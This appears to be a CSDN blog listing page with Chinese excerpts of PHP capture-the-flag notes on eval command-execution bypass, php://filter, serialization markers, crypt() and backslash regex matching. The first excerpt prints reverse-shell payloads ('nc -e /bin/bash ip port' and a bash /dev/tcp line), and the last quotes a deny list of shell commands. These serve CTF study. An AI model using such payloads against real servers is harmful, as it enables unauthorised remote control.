![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
php
名字被抢的Stars
这个作者很懒,什么都没留下…
展开
-
一道经典的命令执行
话不多说,附上链接CTF中的命令执行绕过涉及到的代码如下<?php highlight_file(__FILE__);if ($x = @$_GET['x']){ eval(substr($x, 0, 5));}很简单的代码,将我们传入的值取前五位进行evalpayload?x=`$x`;nc -e /bin/bash ip port或者?x= `$x`;bash -i >& /dev/t原创 2020-10-02 18:04:25 · 306 阅读 · 0 评论 -
php://filter总结
在做ctf的题得时候总是做到文件读取的题,这里总结一下关于已知的php://filter中filter种类中的总结convert.base64-encode与convert.base64-decodestring.rot13convert.iconv.UTF-8.UTF-7(convert.iconv.FROM_ENCODING.TO_ENCODING)convert.quoted-printable-encode和convert.quoted-printable-decode...原创 2020-09-19 22:43:27 · 524 阅读 · 0 评论 -
php 序列化的字母标识
ctf比赛中经常出现php反序列化的题,所以写一篇博客来记一下php序列化中的字符标识,可能以后会有补充a:array 数组php > echo serialize(array());a:0:{}php > echo serialize(array(1,2));a:2:{i:0;i:1;i:1;i:2;}i:integer 整数php > echo serialize(14);i:14;b:boolean bool值php > echo serialize(原创 2020-08-14 15:04:16 · 1343 阅读 · 0 评论 -
php crypt()函数问题
crypt ( string $str [, string $salt ] ) : string原创 2020-08-13 16:26:43 · 165 阅读 · 0 评论 -
php 正则匹配反斜杠的问题
php 正则匹配反斜杠的问题在做安洵杯 2019的easy web时碰到了php的反斜杠问题,想来研究一下,可以在buuctf上复现一下稍微修改一下源代码,方便研究$cmd = $_GET['cmd'];echo $cmd;echo "<br>";if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|原创 2020-06-09 16:28:19 · 939 阅读 · 0 评论